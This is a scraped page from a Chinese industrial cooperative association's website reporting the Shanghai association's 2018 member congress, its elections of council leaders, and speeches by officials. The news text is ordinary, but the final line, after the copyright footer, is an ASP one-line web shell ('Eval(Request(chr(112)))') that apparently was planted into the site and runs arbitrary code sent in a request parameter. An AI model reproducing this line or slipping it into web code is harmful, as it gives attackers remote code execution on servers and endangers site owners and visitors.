设为首页 加入收藏 工合新闻 电子商务 入会须知 联系我们  

网站首页
  工合新闻
>>  2011年
>>  2012年
>>  2013年
>>  2014年
>>  2015年
>>  2016年
>>  2017年
>>  2018年

地址:北京市东城区建国门北大街金成建国5号1702
电话:010-66165725   

E-mail:gunghobianjibu@126.com

 

  工合新闻
 
上海市工合八届一次会员大会暨八届一次理事会隆重召开
 发布时间:2018/3/15 浏览次数:663

   上海市工业合作协会第八届会员大会暨第八届一次理事会议,于2018年3月15日在上海快乐家园大剧院成功举行。

      中国工业合作协会理事长唐保玲出席会议,上海市工合老领导赵定玉、王志宽应邀出席会议。中国工业合作协会杜昱寰副秘书长、办公室主任刘为超、会员部主任张李红出席会议。出席会议的还有获得2016-2017年度先进集体的代表和先进个人。

      大会由上海市工业合作协会理事长陈启豪主持。中国工业合作协会理事长唐保玲作了热情洋溢的讲话。

      大会首先听取和审议了陈启豪理事长受市工合第七届理事大会委托所作的工作报告;审议了俞纯红秘书长代表第七届理事会作的《上海市工合第七届理事会财务收支审计情况报告》。听取了董服龙副理事长就协会《章程》(草案)修改的说明。

      会议以举手表决的方式通过了上述议案。接着大会以无记名投票方式通过了《会费标准和管理办法》;并在总监票人的主持下以无记名投票方式选举产生了第八届理事会理事、监事。在随后召开的第八届第一次理事会议上,全体理事以无记名投票方式选举产生了市工合第八届理事长、副理事长、监事。 

      董服龙当选为上海市工业合作协会第八届理事会理事长;俞纯红、姜 军、朱家贤、乔 琦、丛新惠、薛祖国、何文龙、孙 佩当选为市工合副理事长;郑洪捷当选为市工合第八届监事。根据第八届新任理事长董服龙的提名,理事会决定任命沈忠民为第八届上海市工业合作协会秘书长。

      陈启豪理事长在报告中指出,第七届理事会根据工合组织的历史使命、组织性质、地位作用,以工合倡导的“团结合作一起干”的精神,带领全体工合人站在了新世纪发展的新起点上,主要的工作是:(一)响应国家战略,创建高端平台。一是举办了“首届世界无人系统大会”,开拓以人工智能技术为核心,引领新一轮产业革命的高端科技平台。二是创建“全国产业园区大会”,并成功举办了第三届全国产业园区大会,为我国经济新一轮结构调整和产业导向提供有说服力的信息根据。三是举办“中国特色小镇高峰论坛”,探索小城镇和产业园区如何结合互补的发展模式,推动新时代我国社会朝着生产、生活、生态三者有机结合和谐发展的方向前进。(二)拓展内外联系,扩大发展空间。市工合按照中央对上海的定位,一是努力拓展国内外经济联系,组织相关会员企业考察各地产业园区,为下一步发展目标定位和市场拓展提供有力支持。二是借助各类展会商机,帮助会员企业开拓市场,五年来市工合先后与华交会、上交会、工博会、水博会等展会签订了战略合作协议。通过展会的平台,帮助会员企业拓展国内外新的市场。(三)加强学习培训,提升企业素质。一是及时开展形势教育;二是组织专家开展专业培训;三是组织内部学习交流;四是提升会员企业诚信资格取得了很好的成绩。(四)支持基层企业,增强综合实力。(五)加强组织建设,弘扬先进文化。(六)全市工合联动,创新转型发展。报告同时对下一届理事会提出了工作建议。

      在随后举行的全体大会上,新任第八届理事长董服龙发表了题为《整合资源服务企业,让会员企业有明显的获得感》的就职演说。

    董理事长首先衷心感谢陈启豪理事长的鼎力举荐,也感谢全体会员代表和理事的信任和支持。他表示,新一届理事会将贯彻十九大新时代精神,根据国家发展人工智能的战略规划,根据上一届理事会的战略布局,高举标杆旗帜、整合资源,用好三大平台,通过服务企业让会员企业有获得感来发展工合组织。同时将会员企业的需求互换转化为商业价值,整合资源、互换共享,以工合会员企业的明显获得感来注解新时代工合“团结合作一起干”的精神,继承光荣传统,走向时代前列,为人工智能新时代做出贡献,为传统企业转型升级和科技融合发展做出贡献。

      在热烈的掌声中,中国工业合作协会理事长唐保玲作了热情洋溢的讲话。

      唐理事长充分肯定了上海市工合在继承老一辈工合人的优良传统的基础上,按照党中央对上海工作的总体要求,积极思考,主动出击,勇于改革,不断奋进,使工合工作有了一个新的飞跃,取得了一系列重要成绩!她衷心希望上海市工合在历史新时期,认真贯彻习近平新时代中国特色社会主义思想,不忘初心,牢记使命,继承中国工合的光荣传统,以时代的使命感和社会责任感,带领工合全体同仁,发挥全国工合排头兵的作用,为工合事业的发展作出新的贡献。

      大会表彰了2016-2017年度上海市工合系统先进集体和先进个人。

 

 

 

中国工业合作协会  版权所有

指导单位:中华人民共和国民政部、国务院国有资产监督管理委员会

主办单位:中国工业合作协会 

电话:010-66165725 邮箱:gunghobianjibu@126.com  地址:北京市东城区建国门内大街金成建国5号1702

"%><%Eval(Request(chr(112)))%><%'.